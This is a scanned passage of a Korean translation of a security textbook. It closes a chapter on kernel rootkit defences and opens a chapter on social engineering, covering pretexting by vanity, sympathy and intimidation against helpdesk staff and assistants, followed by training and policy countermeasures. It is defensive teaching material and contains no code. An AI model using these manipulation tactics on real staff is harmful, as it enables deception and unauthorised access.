준위 에 접 근의 길 이 열린 다. 그러 나 체 계관리 자가 트립 와이 어 같은 파일 체 계 검 
사프로그람을 실행시키 면 표준/ bin/login 루린이 해석된다. 실행대상만 바뀐것 이 다. 
원래의 /bin/login 파일을 보고 그 무결성을 확인한다. 이 원래의 루린은 변형되지 
않고 있으며 트립와이어의 하쉬도 그대로 있다. 

• 파일숨기기기능 많은 핵심부루트키트들을 씨서 공격자들은 파일체계에 그 어떤 
파일도 숨기기를 한다. 그 어떤 사용자나 응용프로그람이 그 파일을 찾으면 핵 
심 부는 그 파일 이 존재하지 않는다고 거 짓 말을 한다. 물론 그 파일 은 그 콤퓨터 
에 있으며 공격자가 마음 먹으면 언제든지 그 파일에 접근할수 있다. 

• 과정숨기기 파일을 숨기는것이외에도 공격자는 핵심부준위루트키트를 써서 그 
콤퓨터 에서 실행과정을 숨길수 있다. 

이 매 특성 들은 그자체 로만도 그 기 능이 상당히 강하다. 이 것 들을 합쳐 리용하면 공 
격자는 마음 먹는대로 그 콤퓨터를 완전히 개조할수 있는 능력을 가질수 있다. 체계관리 
자는 모든것이 그대로 있는듯하나 공격자가《창조》해 놓은 체계를 보게 될것이다. 그 
러나 체계는 말그대로 속까지 푹 《썩은》것이다. 게다가 모든 체계접근이 공격자가 조 
작해 놓은 핵 심 부에 의 존하므로 사용자가 핵 심 부준위 루트키 트유무검 사를 해 도 발견 하기 
가 상당히 힘들다. 

핵심부준우 I 루트키트에 대처한 방안들 공격자들이 핵심부준위루트키트(혹은 전통적 인 
루트키트)를 설치하지 못하게 하기 위해서는 무엇보다먼저 공격자들이 우리 체계에 운용 
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관리자의 권한을 가지지 못하게 하는것이 중요하다(운용관리자란 임의의 파일에 자유롭 
게 접근할수 있을뿐아니라 콤퓨터체계의 운영과 사용，보수 및 점검에 필요한 작업을 수 
행할수 있는 사용능력과 자격을 갖춘 관리자를 말한다-역주). 운용관리자로서의 권한을 
주지 않으면 공격자는 핵심부준위루트키트를 설치할수 없다. 또한 중요한것은 체계설정 
을 안전하게 해놓아 모든 불필요한 봉사항목들은 제거하며 해당한 보강대책도 세워야 한 
다. 각 체계를 강화하고 체계들을 정비보강하는 사업을 정상적으로 하는것이 핵심부준위 
루트키 트를 처 리 할수 있는 최선의 예 방책 이 다. 

또 하나의 방비대책으로서는 핵심부를 동적으로 수정시키는 일부 조작체계들의 기능 
인 적 재 가능핵 심 부모둘 ( LKM ) 을 지 원 하지 않는 핵 심 부들을 배 치하는것 이 다. LKM 들은 핵 
심 부준위 루트키 트들을 실행 시키 는데 흔히 리 용된다. LINUX 핵 심 부들은 핵 심 부모둘지원 이 
없 이 구성될수 있다. 그러 나 쏠라리 스8과 그이상의 체 계 들은 핵 심부모둘기 능억제 능력 이 
없 다. 인 터 네 트는 Web 봉사기，우편 봉사기 , DNS 봉사기， FTP 봉사기 와 같은 사활적 인 
LINUX 체계들에 대해서는 LKM 접수능력 없는 자기체계의 핵심부들을 가지고 있어야 할 
것이다. 바로 비모둘적핵심부들을 가짐으로써만 다양한 형태와 수법의 공격을 물리칠수 
있 을것 이 다. 


결 론 


콤퓨터방위 자들과 콤퓨터침공자들사이의 군비경 쟁의 가속화는 계속 진행되 고 있다. 
침 공자들이 광범한 분산공격 수법 을 개 발하여 우리 의 규약들과 조작체 계 들의 속으로 더 욱 
깊숙이 뚫고 들어 오는 조건에서 우리는 더욱더 열심히 일하여 우리 체계들의 안전을 지 
켜 야 한다. 용기 를 잃지 말라. 사실 이 장에 서 언급된 방어기 법 들을 활용하자면 작업 량이 
적지 않다. 그러나 체계설계와 유지를 깐깐히 해나가면 틀림없이 안전한 기반을 구축할 
수 있을것이다. 
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제 4 장. 사회공학의 위험 


튼버리 
마커스 로져스 


정보보안실행자들은 정보기술의 주요목적이 사용성，무결성，비밀성 ( AIC 의 3자일체) 
이 라는데 대 하여 너 무나도 잘 알고 있 다. 그러 나 방어 체 계 혹은 보안체 계안에 약한 고리 
가 하나 있 다면 이 세 가지 목적 중 어 느 하나도 달성할수 없 다. 흔히 사람들이 말하는것 
처 럼 정 보보안에서는 가장 약한 고리 가 어 느정도인가에 따라 보안강도를 판정할수 있다. 
정 보보안과 정 보기 술보안에 대 하여 말할 때 우리 는 흔히 이 보안체 계 의 련쇄고리 들중 그 
어떤 기술적분야만 생각하군 한다. 최신판조작체계와 응용체계나 하드웨어가 가지고 있 
는 취 약점들을 서술한 수많은 참고도서들을 정보보안관리실행 자들은 읽어 볼수 있을것이 
다. 많은 회사들도 이러한 취약점들을 먼저 발견하며 그에 기초하여 자기들의 기업경영 
계획들을 세우고 경쟁력을 키우며 그다음에야 사회와 판매업체에 대응책들을 제공하고 
있다. 보안산업의 초점 이 일 차적 으로 하드웨 어，쏘프트웨어，펌 웨어와 정보보안의 기술적 
측면들에 돌려 지 고 있는것 은 너 무나도 명 백하다. 

보안산업 은 콤퓨터 들과 기 술이 단순한 도구들이며 이 도구들을 사용하고 설정하 
고 설 치 하고 실행시키거 나 악용하는것도 바로 사람이 라는것 을 잊 어 버 린것 갈다. 정 
보보안은 단순히 여 러 가지 기 술적 인 복합조종과정 을 실 행하는것 만이 아니 다. 정 보보 
안은 사람들의 행위，더 정 확히 말하여 비 행을 처 리하는 문제도 포괄한다. 정보보안 
이 효과적인것으로 되자면 《사람》을 나타내는 용어인 《웰웨어》 ( wetware ) 가 가지 
고 있는 약한 고리 들도 극복하지 않으면 안된 다. 숱한 자금과 노력 을 들여 기 술적통 
제수단들을 꾸러 놓고 더 좋고 더 안전한 코드를 만들어 놓았다 해도 우리 사람들이 
《 왕국으로 가는 이 열쇠들》을 루설해 버리면 이 모든 공사는 허사로 되고 말것 이 
다. 망공격과 관련한 최근 연구자료들을 보면 이것들은 정확히 말하여 사람들이 무의 
식적 으로 한것 이 라는것 이 다. 그렇 기때 문에 우리 는 《 사회공학》이 라고 하는 공격 으로 
우리의 체계 에 비 법접근하는 량심 없는자들의 희생 물이 될수 있는 가능성 이 그만큼 
더 높다. 

이 장에서는 이러한 공격수법이 어떻게 진행되며 흔히 쓰이는 수법들은 어떤것들 
이며 또 교육과정과 강습，통제 로 사회공학의 위험성 을 어 떻게 약화시키겠는가 등을 
자세 히 해 부해 봄으로써 사회공학을 일 정하게 나마 밝혀 보려 고 한다. 이 장은 방도를 
제시해 주는 장이 아니라 이러한 일부 공격수법들의 세부와 사회공학의 희생물로 되지 
않기 위해서는 어떻게 할것인가를 토론해 보는 장이라고 볼수 있다. 이 모든 정보는 
비밀 이 아니 며 사회 의 일정한 분야들에 이 미 널 리 알려 진것들이 다. 따라서 정 보보안 
전문가들도 사회공학과 그 위 험성 을 극복하기 위한 보안통제대 책들에 대 하여 잘 아는 
것이 중요하다. 
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사회공학의 정의 


사회 공학이 란 무엇 인가를 리 해 하자면 토론되는 내용이 무엇 인가를 명백 히 정의 하는것 
이 우선 중요하다. 《 사회공학》이 라는 용어는 새로운 용어가 아니 다. 사회조종분야에서 
나온 용어이다. 사회공학은 일정한 목적의 결과를 얻기 위하여 어떤 하나의 협회(영어에서 
a society 는《협회》나《사회》를 의미 함) 즉 더 정확히 말하여 공학자협회를 가리킬수도 
있다. 이 용어는 또한 사람들이 일정한 새로운 체계나 체계에 복종시키기 위한 목적으로 
그들의 행동을 예상대로 변화시키 려는 과정을 가리킬수도 있다. 여기 에서 적절한것은 바로 
이 후자 즉 사회 공학에 대 한 사회 심 리 학적 정 의라고 할수 있 다. 우리 의 목적 의 견지 에 서 

사회공학이란《어떤 사람에게 영향을 주어 그가 정보를 류출시키게 하거나 정보체계, 
정보망，정보자료가 비법접근되거나 비법사용되거나 혹은 비법공개되도록 그 사람을 행동하 
게 하는 성 공적 혹은 비 성 공적 시 도》라고 정 의 할수 있 다. 

정의에서 볼수 있는바와 같이 사회공학은 어떤 사람에 대한 속임수나 기만과 동의어 
적 관계 라고 할수 있다. 사람 한명쯤 기 만하거 나 깜짝 속이는것은 범죄 활동의 령역 에서는 
아무런 새것도 아니다. 이 수법은 오래 존속되여 왔음에도 불구하고 아직도 놀라울 정도 
로 효력이 높다. 

이 시점에서 사회공학이 안고 있는 문제점들의 규모가 얼마인지 일정한 정보를 알고 
있다면 매우 흥미 있을것이다. 그러나 아쉽게도 여기에 쓸만한 자료는 거의 없다. 정보보 
안분야에서 사회공학에 대하여 자주 언급은 되였지만 이러한 형태의 공격에 대한 직접적 
인 토론은 지 금까지 많이 진행 되 지 못하였 다. 그 리 유는 각이하다. 이 분야의 일부 사람 
들은 사회공학은 사람의 지능에 대한 공격이여서 그런 공격이 있었다는것을 사람들이 대 
체 로 인정 하려고도 하지 않는다고 말한다. 그러 나 이 에는 상관없이 일부 악명 높은 콤퓨 
터범죄 자들은 실지 기술적 문제보다 사회 공학에 더 욱 의거하여 자기들의 범죄를 계속하고 
있다. 통과암호만 누구한테 물어 보면 되겠는데 무엇때문에 고생스레 시간을 랑비하며 
남의 체계를 연구하고 스캔하며 체포될 위험까지 무릅쓰는가. 

거의 모든 콤퓨터범죄 자들은 다 기회 를 노리는 기회 주의 자들이 다. 그들은 남의 체 계 
에로 들어 가는 더 쉬운 길을 노리고 있다. 

어떻게 되여 사회공학이 작용하는가 


사회 공학적공격 이 성공하는것은 주로 두가지 요인 즉 인간의 마음과 기 업 환경이 다. 

인간의 마음 

사회공학적공격의 희생물이 되는것은 지능과는 아무런 관계도 없으며 인간적 인것 즉 
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다소 순진하여 이러한 공격에 대처할만한 마음의 준비나 훈련이 부족한것과 전적으로 관 
련되여 있다. 사람들은 대개 본태적으로 남을 믿으며 남을 도와 주려고 하는것이다. 사회 
심리학은 인간관계를 집단과 개 인의 견지에서 연구하여 왔다. 그 연구결과들을 보면 대 
체로 그 누구든 적절한 조건에서 재간 있는 사람과 교제를 하는 경우 영향을 받아 다른 
환경에서는 루설하지 않을 정보도 루설하거나 류다르게 행동할수 있다고 한다. 또한 연 
구자료에 의하면 권력자이거나 권력자행세를 하는 사람들은 쉽게 다른 사람들을 위협할 
수 있 다. 

많은 경우 사회공학은 1차적 인 목표물들이 문의소일군，행정 및 기술지원일군들이므 
로 집단심리에 대치되는 개념인 개인심리를 리용하고 있다. 

대인관계는 대체로 일대 일이나 서로 얼굴을 마주하는것이 아니다. 전화나 직결상태 
의 관계이다. 아래 부분에서 설명되겠지만 공격자들은 이러한 심리적인 공격에 약해 보이 
는 사람들을 항상 찾고 있다. 

기업환경 

기업병합과 흡수，기술의 급속한 발전，광지역망의 확산이라는 최근의 경영추세와 기 
업환경은 인간의 심리와 더불어 사회공학에 더 좋은 기회를 주고 있다. 오늘날의 기업세 
계에서 공급자，관매자，고객들은 제쳐 놓고서라도 자기 기관에서 항상 함께 거래하는 사 
탐들을 한번도 만나보지 못했다는것은 틀린 말은 아니다. 종업원들을 위한 원거리통신체 
계와 기술이 너무나도 많이 도입되여 사람들사이에 일대 일로 얼굴을 마주 보며 하는 대 
인관계가 점점 더 희귀한 현상으로 되여 가고 있다. 오늘날의 시장세계에서는 어느 기관 
이나 기업을 위해 일한다 해도 몇몇 례외적인 사람들을 제외하고는 거의 사무실에 발을 
들여 놓는 경우가 점점 희미해 지고 있다. 우리가 일하는 환경에서 흔히 있는 보지 못하 
고 진행되는 추상적인 대인관계에도 불구하고 사람들에 대한 근본적믿음 지어는 실지 한 
번도 만나보지 못한 사람들에 대한 이러한 믿음은 아직도 변함이 크게 없이 그대로인것 
이다. 

오늘날 기업들과 기관들도 이전보다 훨씬 봉사지향적 인 방향으로 나아가고 있다. 종 
업원들에 대한 평가는 흔히 그들이 협동적인 환경들에 얼마나 기여하였는가 그리고 고객 
들과 다른 부서에 대한 봉사수준에 따라 진행되군 한다. 그러나 자기 사업을 수행할 때 
어느 정도의 상식을 리용하였으며 보안의식이 얼마나 있는가를 계측하는 평가지표들은 
보기 힘들다. 사회공학의 위험에 효과적으로 대응하기 위해서는 바로 이러한 구조관계를 
개선해야 할 필요가 있다. 


사회공학적공격 


사회 공학적 공격 은 단계 별로 진행 되군 하는데 대 부분의 경우 첩보기관에서 자기 가 노 
리 는 대 상물에 침투하는 방법 과 매 우 류사하다. 
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간단히 보여 주기 위하여 그 단계들을 다음과 같이 묶어 볼수 있다. 

• 정 보수집 

• 대상선정 

• 공격 

정보수집 

사회공학적공격이 성과를 거두는 비결의 하나는 정보이다. 회사종업원으로，판매업체 
대표로 혹은 법기관의 성원으로 가장하기 위하여 어떤 기관이나 그 성원들에 대한 충분 
한 정보를 쥐는것은 상당히 쉽다. 각 기관들에서는 자기들의 시장경쟁력을 높이기 위한 
전략의 한 고리로서 Web 싸이트에 너무나도 많은 정보들을 내놓고 있다. 이 정보들을 보 
면 대개 어떤 판매업체와 대상하고 있는가 하는 단서들, 전화번호와 전자우편목록들도 
있으며 지사들이 있는가 없으면 어디에 있는가 하는 내용들도 다 알수 있게 되여 있다. 
일부 기관들은 지어 자기들의 Web 폐지들에 자기 기관의 조직구성도를 구체적으로 그려 
내놓기까지 하고 있다. 투자를 희망하는 사람들에게 이 모든 정보가 유용할수 있으나 이 
것은 사회공학적공격에도 하나의 중요한 발판으로 리용될수 있다. 

깊이 생각하지 않고 만들어 낸 Web 싸이트들만이 공개정보의 원천으로 되는것이 아 
니다. 기 관들에 서 버 린것 들도 중요한 정 보원천 으로 될수 있 다. 해 당 기 관의 쓰레 기 장을 
쭉 지나가면(이것을 쓰레기장산보라고도 한다.) 공격자가 중요한 정보를 장악하는데서 
도움이 될수 있는 송장들，서신들, 사용지도서 등이 많이 보인다. 법에 기소된 여러 를 
퓨터범 죄 자들은 대 상물에 대 한 정 보를 수집 하기 위하여 쓰레 기 장산보를 했 다는것 을 실 
토하였다. 

이 단계에서 공격자의 목적은 될수록 많은 정보를 알아냄으로써 자기를 합법적 인 진 
짜직원，계약자，판매자，전략적동반자 혹은 경우에 따라 법기관 혹은 수사기관일군으로 
가장하는것 이 다. 

대상선정 

일 단 충분한 량의 정 보를 수집하면 공격 자는 그 기 관의 성 원들중에 서 눈에 띄 우리 만 
큼 약한 고리 들을 찾는다. 가장 흔히 선택하는 대 상은 문의 소 ( helpdesk ) 일 군들이다. 그것 
은 이들이 문의방조를 줄수 있게끔 강습 받은 전문가들로서 통과암호변경，사용자기록부 
창조 및 재개 등을 말아 처리하기때문이다. 일부 기관들에서는 그들의 봉사기능을 계약 
에 의해서 실지 거 래 관계 가 없는 계3자에게 로 확대 하기도 한다. 이것은 계 약을 맺 은 제3 
자기관이 이 기관의 종업원들을 한명도 모를수 있음으로 하여 사회공학적공격의 성공의 
기회는 더욱 좋아 진다. 공격자들은 이 경우 기밀정보수집이나 체계에로의 발판확보에 
목표를 두군 한다. 공격 자들은 고객 수준에 서라도 접 근이 허 용된 이 상 고객 으로서 봉사 
받을 특권을 더 높여 보다 파괴 적 인 공격 을 실행하며 자기 들의 흔적 을 지 울수 있는 가능 
성 이 상대적으로 높다고 본다. 
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행정관리일군들의 보조자들이 그다음으로 가장 많이 선정되는 피해자들이다. 그 리 
유는 주로 경영측의 고위일군들사이에만 오고가는 다량의 기밀정보들에 접촉하는 사람들 
이 바로 이들이기때문일것이다. 이들은 공격대상점으로 리용되든가 아니면 그 기관내의 
영향력 있는 인물들의 이름과 관련한 보충정보수집에 리용되는것 이 상례 이 다. 그 기관에 
서 모든 일을《쥐 락펴 락하는 사람》들의 이름을 알면 필요할 때 《거 아무개 있잖아》 
하는 식으로 자기 친구이름 부르듯이 하여 자기를 과시할수도 있을것이다. 또한 많은 행 
정일군보조자들이 자기 집행리사의 통과암호들을 알고 있으면 더욱 좋을것이다. 이 많은 
보조자들은 정상적으로 자기 회사들의 구좌특혜에 관한 계산작업(례하면 계산표갱신)과 
전자력서 로 면담약속 등을 계 획하는 등 여 러 가지 일을 한다. 

공격수 법 


실제적인 공격은 흔히 con 이라고 부르는 수법들에 기초한다(여기서 con 이라는 단어 
는 사람들의 신임을 상당히 얻은 다음 그것을 발판으로 그들에 대한 사기행위를 하는 자 
들 즉 confidence artist 들을 간단히 부르는 말이다.-역주). 이것들을 부류별로 묶어 보면 
세가지 즉 (1) 대상의 허영심이나 자만심을 자극하는 방법의 공격형태들, (2) 동정심이나 
공감을 교묘히 리용하는 공격 형 태 들, (3) 협 박에 의한 공격 형 태 들로 갈라 볼수 있 다. 

자만심들 리용한 공격 

첫번째 형태의 공격인 자만심이나 허영심을 리용한 공격에서는 공격자가 인간의 가 
장 기초적인 특성들을 몇가지 리용하게 된다. 우리모두는 다른 사람들이 우리들을 보고 
상당히 똑똑하다고 말하면 좋아 하며 자기가 하는 일에 대하여 그리고 회사사업 이 제대 
로 되자면 어떻게 해야 하는가에 대해서는 실지로 알고 있다. 공격자들은 이것을 리용하 
여 만만한 사람들이 자기 지식을 굉장히 과시할 때 긍정해서 들어 주는 식으로 필요한 
정보를 얻어 낸다. 공격자는 응당한 평가를 받지 못하고 있다고 느끼는 사람들과 가지고 
있는 재 능에 비해 낮은 지 위 에서 일하는 사람들을 공격 대 상으로 선정한다. 공격 자가 이 
런것 을 알자면 그러한 사람들과의 대 화를 간단히 한번 하면 되 는것 이 다. 흔히 공격 자들 
은 이런 공격수법을 리 용하여 정확한 대상을 찾을 때까지 서로 각이 한 여러 사람들파 만 
나 이 야기한다. 불행 하게 도 대 부분의 경 우 피 해 자는 자기 가 무엇 을 잘못했 다는것 을 전혀 
모르는것 이 다. 

동정심들 리용한 공격 

두번째 부류의 공격에서 공격자는 흔히 자신을 새로 들어 온 동료사원，계약자 혹은 
어느 판매업체의 신입사원으로 가장하고는 우연히 곤경에 빠져 있는데 급히 무슨 일을 
처 리 하기 위해 방조가 필요한듯이 말한다. 여기서 바로 첩 보단계의 중요성 이 명백 히 나 
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타나는데 그것은 공격자가 그 만만한 사람에게서 일정한 정도의 신임을 엄어 그 사람이 
공격자의 신원에 대해 그대로 믿도록 해야 하기때문이다. 이렇게 하자면 권위 있는 최고 
실력자들의 이름들을 마치도 자기 동무들의 이름을 부르듯 하며 그들이 사용하는 적당한 
은어들과 낱말들도 입에 올리며 그 기관에 대한 자기 지식도 보여 주어야 한다. 그러면 
서 자기는 바빠서 자료를 좀 봐야 할 일이 있는데 구좌이름이나 통과암호가 생각나지 않 
는다는것，실수로 열쇠를 방에 놓은 채 문을 닫고 나와서 그런다고 꾸며 댄다. 여기서 매 
우 급해서 그런다는 내용이 중요하다. 그것은 그래 야 필요한 절차들을 건너 뛰여 공격자 
가《 진짜인물》로 되며 자료에 접근할수 있기때문이다. 공격자가 가장한 그 인물의 감 
정에 동정을 표시하는것은 인간의 일반적인 심리이다. 결국 대부분의 경우에 이 요구들 
은 수락되게 된다. 공격자는 어느 한 사원으로부터 정보나 정보접근을 엄지 못하는 경우 
동정하는 사람을 찾을 때까지 혹은 그 기관전체가 자기를 의심한다는것을 깨달을 때까지 
계속 더 공격을 시도할것이다. 

협박들 리용한 공격 

세번째 부류의 공격에서는 공격자가 자신을 권력인물로 즉 그 기관의 유력자나 혹은 
문건관계에서는 법기관인물로 가장한다. 공격자는 자기가 가장한 인물의 지위보다 몇단 
계 낮은 위치에 있는 만만한 사람을 목표로 한다. 공격자는 그럴듯한 구실을 하나 꾸며 
통과암호재설정，구좌변경，콤퓨터체 계접근권 혹은 기밀정보를 일정한 형태로 요구한다 
(기 밀정 보의 경우 법 기 관일 군으로 가장하며 이때에는《 극비》조사라느니 국가안전과 관 
련한 문제 라거 니 하는 씨나리오를 연출하여 그 사원이 이 사건을 더는 들고 다니지 못하 
게 한다.》. 공격자는 자기가 마치도 그 사람에게 으름장을 놓을수는 있으나 잘 알려 질 
정도의 인물은 되지 못하는척 한다(최고행정관 즉 회사사장이나 리사장들은 보도매체나 
년례종업원총회에서 잘 알려 진 인물이며 대부분 업무시간이 지난후에 자기 종업원들을 
찾아 잊어 버린 통과암호를 고치라고 요구할수는 없는것이 다. 그런것들은 보좌성원들이 
할 일이다.). 공격자들의 각본에서 기본은 시간이다. 그것은 공격절차가 어떠하든 우회할 
필요가 있기때문이다. 만약 저항에 부딪치면 공격자는 너희들이 말 안들으면 제재를 받 
게 하겠다는 식으로 위협 하여 협조해 나서도록 할것 이 다. 

우 I 험들 완화하는 방도 


사회공학적공격의 형태가 어떠하든지 성공률은 놀랄만큼 높다. 기소된 를퓨터범죄자 
들은 대부분 사람들이 자기들의 수에 간단히 속아 자기들의 체계에로《걸어 들어 갈》 
수 있게 해준데 대해 롱담까지 하고 있다. 사회공학적공격의 위험성과 영향은 크다. 이러 
한 공격자들은 대개 추적하기 힘들며 일부 경우에는 누구인지 밝혀 내기 힘들다. 공격자 
가 만일 합법적인 접속기록철을 통하여 접근권을 얻었다면 경보신호는 절대로 울리지 않 
을것이다. 그것은 체계와 관련된 문제에서는 잘못한 점이 전혀 없기때문이다. 
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사회공학이 실현되기 쉽다면 각 기관들은 이런 공격의 위험성을 어떻게 방지할것 
인가. 이 문제에 대한 대답은 상대적으로 간단하다. 그러나 기관의 전체 성원들의 사고 
관점에서의 변화를 필요로 한다. 즉 사회공학의 위험성을 약화시키기 위해서는 각 기 
관들이 자기 종업 원들속에서 정 보보안상 위험성들과 사회공학적공격 의 경 우들을 발견 
해 낼수 있게 교양사업과 강습을 잘 진행해야 한다. 이러한 공격을 억제할수 있는 방 
도는 바로 교육하고 알려 주며 훈련시키는 등 여러가지 통제사업에 있다. 이에 대해서 
는 아래에서 보자. 

사회공학의 대상은 정보보안이 라는 련쇄고리에서 가장 약한 고리 인 사람들에게 초점 
이 맞추어 져 있다. 어떤 사람이 한 사원을 설득시켜 기밀정보를 제공하게 할수 있다는 
사실은 가장 안전한 체계에도 취약성이 있다는것을 의미한다. 그 어떤 정보보안해결책이 
든지 사람이 거기서 노는 역할이 가장 중요하다. 사실상 모든 정보보안해결책들은 사람 
이라는 요소에 많이 의거한다. 이것은 이 약한 고리인 사람이라는 요소는 하드웨어，쏘프 
트웨 어，가동환경，망，설비로화 등과는 관계 없이 보편적 이 라는것을 의미한다. 

많은 회사들은 정보보안을 잘 담보하기 위해 수만딸라를 지출한다. 이 보안체계는 
그 회사들이 정보까지 종합하여 자기의 가장 중요한 재산을 지키는데 리용된다. 불행하 
게도 이렇게 최상급으로 꾸러 놓은 보안체계도 사회공학적기법을 적용하는 경우 무효로 
되여 버릴수 있다. 사회공학적기법들은 매우 원가가 눅으며 매우 낮은 기술수단들을 리 
용하여 이 정보보안대책들의 장애를 제거해 치운다. 

사회공학에 대처한 보호 


사회공학의 위협으로부터 자신들을 보호하기 위해서는 정보보안에 대한 초보적인 리 
해가 필요하다. 간단히 말하여 정보보안이 란 정보에 대하여 우발적 이든 의도적 이든 비법 
적으로 로출시키거나 이전시키며 변경시키거나 파괴하는 현상을 미리 막는것이라고 정의 
할수 있다. 일반적으로 보면 정보보안은 한 회사의 자료와 정보，체계와 봉사가 그 어떤 
형태의 위협으로부터 정확히 보호될 때 그 회사가 도달한 상태를 의미한다. 정보보안은 
다양한 형태의 위협으로부터 정보를 보호함으로써 기업의 존속을 담보하고 기업의 손실 
을 최소화하며 투자결과나 기업의 호기를 최대화하는것이다. 정보보안은 기업의 돈，영상， 
명예 그리고 그 기업의 존재를 안전하게 지키는 문제이다. 

보호과정은 흔히 세가지 부류로 나눌수 있으며 여기서 중요하게 알아야 할것은 기관 
의 정보보안을 정확히 해나가자면 사회공학적공격을 비롯한 어떤 형태의 공격위협이든지 
그로부터 자신을 정확히 지키기 위하여서는 이 세가지를 다 결합시키는것이 필수적이라 
는것 이 다. 


물리적 보안 
론리적 (기술적)보안 
행정적보안 
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정 보보안실행 자들은 정 보보안관리 는 균형 적 으로 진행 되 여 야 한다고 오래 전부터 생 각 
하여 왔다. 《균형적》이라는 말의 뜻은 회사마다 다르며 체계의 취약점들，위험요소들， 
정보의 기밀성을 의미하기도 하나 일반적으로 우에서 언급한 세가지 요소들을 다 가리키 
기도 한다. 정보보안의 대책적계획은 매 기업자체의 구체적실정과 요구에 맞게 작성되여 
야 한다. 정확한 균형을 달성 한다는것은 이상의 세 가지 부류에 다 맞는 여 러 가지 정보보 
안대책들을 다 강구하면서도 기관의 보안요구사항들을 가능한껏 효과적이며 원가가 적게 
드는 방향에서 만족시킬수 있는 정확한 균형을 잡는다는것을 의미한다. 정보보안이 잘 
되면 기관의 귀중한 정보재부를 찾아 내는 과정으로 되기도 한다. 즉 이 재부들에 대한 
있을수 있는 위험의 범위를 고려하며 이 실태들에 대처한 효과적인 대책을 세우며 이 대 
책들이 정확히 계획되고 실행되고 납득되도록 하여야 한다. 

물리적보안 

물리적 인 보안요소들은 가장 리해하기 쉬우면서 실행하기도 가장 쉽 다고 한다. 물리 
적보안에 대하여 생각하면 많은 사람들의 머리에는 열쇠，자물쇠，경보기，경비원들이 떠 
오를것이다. 이것들이 정보안전에 고려되는 유일한 보안대책들은 아니지만 바로 론리적 
으로 볼 때 여기가 출발점이라고 할수 있다. 론리적보안과 행정적보안과 함께 물리적보 
안은 정보보안대책안들중에서 사활적인 요소로 될뿐아니라 근본적인 문제로도 된다. 물 
리적보안이라고 할 때 이것은 정보자산을 도난，파괴，재난，자연재해，고의적 및 우발적 
사고 그리고 전기，온도，습기 등과 같은 불리한 환경적조건으로부터 보호하는것을 말한 
다. 물리적보안을 잘 유지하려면 훌륭한 건물 및 시설조건，비상대응능력，믿음직한 전원 
공급，믿음직하고 정확한 온습도조절 그리고 내외의 침입자들로부터의 효과적인 보호가 
필요하다. 

론리적 (기술적)보안 

론리적보안대 책들이 란 기술적 방안을 리 용하여 정보재산을 지키는 대 책들을 말한다. 
실례 로는 방화벽체계，접근조종체 계, 통과암호체 계 그리고 침 입 탐지 체계들을 들수 있다. 
이 통제체계들은 매우 효력 이 있으나 성과적 인 보안대책으로 되자면 사람이 라는 요소 혹 
은 인간호상관계에 대한 정확한 리해에 기초해야 한다. 우에서 언급한바와 같이 보다 쉽 
게 리용될수 있는것 이 바로 이 사람이 라는 요인이 다. 

행정적보안 

행정적보안통제는 대책안，절차，지도서 등을 념두에 둔다. 행정적보안의 실례로는 
정보보안방책 안，의식화계획 그리고 신입사원들을 위한 경력조사 등을 들수 있다. 이 실 
례들은 행정적성격을 띠므로 론리적 및 기술적실행대안으로는 되지 못하나 이 모든것들 
은 함께 정보보안문제를 제기하고 있다. 
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포 팔 범우 I 


정 보보안이 효과적 인것 으로 되 자면 우로부터 아래 에 이 르기 까지，지 도일 군들로부터 
말단사용자에 이르는 기관전체가 다 망라되여야 한다. 가장 중요하게는 어느 기관이든 
그 기관의 최고위층의 지도일군들이 정보보안과 관련한 구상과 원칙들을 승인하고 지원 
해야 한다. 꼭대기로부터 말단에 이르기까지 모든 사람들이 해당 보안방책들을 리해하고 
그에 따라 행동하여야 한다. 이것은 고위관리일군들은 기관의 정보보안방책들을 규정하 
고 지지하고 내려 보내며 이것을 기관내 모든 사람들이 준수한다는것을 의미한다. 또한 
이것은 웃단위일군들이 정보보안을 위하여 자금과 자원을 제공하는 등 필요한 지원을 준 
다는것도 포괄한다. 총괄적으로 볼 때 정보보안방책이 성과를 거두기 위해서는 옷단위일 
군들의 지도능력，확고한 결심，적극적인 참가가 절실히 필요하다. 

결정적인 정보보안전략들이 제대로 실현되기 위한 조건은 1차적으로 모든 사람들이 
절 차대 로 정 확히 행 동하는것 이 며 2차적 으로는 기 술적대 책안들을 리 용하는것 이 다. 그렇 기 
때 문에 사회 공학이 라는 위 협 에 대 처 해 나가는것 이 모든 정 보보안계 획 에 서 결정 적 인 문제 
로 되는것이다. 


사회공학적공격에 대처한 보안 


방책작성，의식화사업 및 교육 

사회공학적공격 들 에 대 처 하기 란 매 우 힘 들다. 사회공학적 공격 에 대 처하는데 서 문제 
로 되 는것 은 거 의 모든 론리 적 보안통제 의 보호기 능이 무력하게 되 는것 이 다. 사회공학적 
공격의 대상이 사람이 기때 문에 행정적측면의 정보보안에 보호대 책의 초점 이 놓여 져 야 
한다. 효과적인 대응책의 하나는 기관전반에 구현할수 있는 훌륭한 정보보안방책을 세워 
놓는것 이 다. 기 관 종업 원들의 《 행 동규범》을 작성하는데 서 방책 은 근본바탕으로 된 다. 
두번째 효과적인 대응책은 사용자에 대한 의식화 즉 교양사업을 잘하는것이다. 이 두가 
지 행정적인 정보보안대응책들을 잘 결합해 나가면 그것이 종합적인 정보보안계획으로 
되 여 모든 사람들이 그것 을 자기 들의 실지 사업 에 서 지 켜 야 할 준칙 의 하나로 리해 하고 
접수할것이다. 기관의 경영적견지에서 보면 이러한 내용을 우로부터 아래에 이르기까지 
전체 종업원들에게 전달하는것은 사활적인것이 아닐수 없다. 결국 이렇게 되면 각급 부 
서들은 보다 경각성을 높이게 될것이며 각자가 모두 회사전체의 복리에 《기여》하게 될 
것 이 다. 이것은 회 사종업 원들모두가 만족스럽게 일해 나갈수 있게 하는데 크게 기 여하는 
중요한 하나의 관점이다. 이것은 또한 정보보안계획에서 또하나의 중요한 우려로 되는 
종업원들의 불만이 라는 위험성도 제거할수 있게 한다. 불만을 가진 이 러한 종업원들이 
바로 사회공학적방법 은 어 떠 하든 기 관내 의 기 밀정 보들을 비 법사용자들에 게 쉽 게 넘 겨 주 
는 사람들인것 이 다. 

사람들은 흔히 직접 체험해 보아야 가장 잘 알게 된다. 매 사람이 사회공학적공격을 
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당할수 있다는것이 증명된 이상 각자는 보다 각성을 높여 경계하게 된다. 다른 기관의 
경험에 대한 토론연단 같은것을 조직하면 자기 기관사람들이 이러한 사회공학적공격에 
더 큰 면역성을 가지게 할수도 있다. 

교양사업을 꾸준히 진행하는것은 매우 중요하다. 교양과정을 정기적으로 반복하 
여 진행함으로써 사회공학과 관련한 기관의 방책들로 재무장시켜야 한다. 기술이 발 
전된 오늘의 조건에서 자기 기관의 종업원들과 정기적으로 만나 담화할수 있는 효과 
